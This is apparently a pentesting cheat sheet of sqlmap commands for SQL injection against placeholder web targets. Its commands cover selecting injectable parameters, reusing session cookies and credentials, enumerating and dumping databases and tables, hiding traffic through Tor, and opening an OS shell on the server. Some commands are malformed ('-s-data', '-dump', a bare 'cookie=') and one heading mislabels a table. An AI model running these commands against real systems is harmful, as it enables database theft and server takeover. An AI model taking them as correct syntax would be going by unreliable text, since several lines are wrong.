Tags
Resource DevelopmentLateral Movement
Table of Content
- Table of Content
- Simple usage
- Specify target DBMS to MySQL
- Using a proxy
- Specify PARAM1 to exploit
- Use POST requests
- Access with an authenticated session
- Basic authentication
- Evaluating response strings
- List databases
- List tables of database TARGET-DB
- Dump table TARGET-SERVER of database TARGET-DB
- List columns of table TARGET-TABLE of database TARGET-DB
- Scan through TOR
- Get OS Shell
- Medium Post:
Simple usage
sqlmap -u “http://<TARGET-SERVER>/”Specify target DBMS to MySQL
sqlmap -u “http://<TARGET-SERVER>/” --dbms=mysqlUsing a proxy
sqlmap -u “http://<TARGET-SERVER>/” --proxy=http://<PROXY-ADDRESS>:<PORT>Specify PARAM1 to exploit
sqlmap -u “http://<TARGET-SERVER>/<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2>” -p <PARAM1>Use POST requests
sqlmap -u “http://<TARGET-SERVER>/” --data=<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2>Access with an authenticated session
sqlmap -u “http://<TARGET-SERVER>/” --data=<PARAM1>=<VALUE1>&<PARAM2>=value2 -p <PARAM1>cookie=’<COOKIE-VALUE>’Basic authentication
sqlmap -u “http://<TARGET-SERVER>/” -s-data=<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2> -p <PARAM1> --auth-type=basic --auth-cred=<USERNAME>:<PASSWORD>Evaluating response strings
sqlmap -u “http://<TARGET-SERVER>/” --string=”This string if query is TRUE”
sqlmap -u “http://<TARGET-SERVER>/” --not-string=”This string if query is FALSE”List databases
sqlmap -u “http://<TARGET-SERVER>/” --dbsList tables of database TARGET-DB
sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> --tablesDump table TARGET-SERVER of database TARGET-DB
sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> -T <TARGET-TABLE> -dumpList columns of table TARGET-TABLE of database TARGET-DB
sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> -T <TARGET-TABLE> --columnsScan through TOR
sqlmap -u “http://<TARGET-SERVER>/” --tor --tor-type=SOCKS5Get OS Shell
sqlmap -u “http://<TARGET-SERVER>/” --os-shell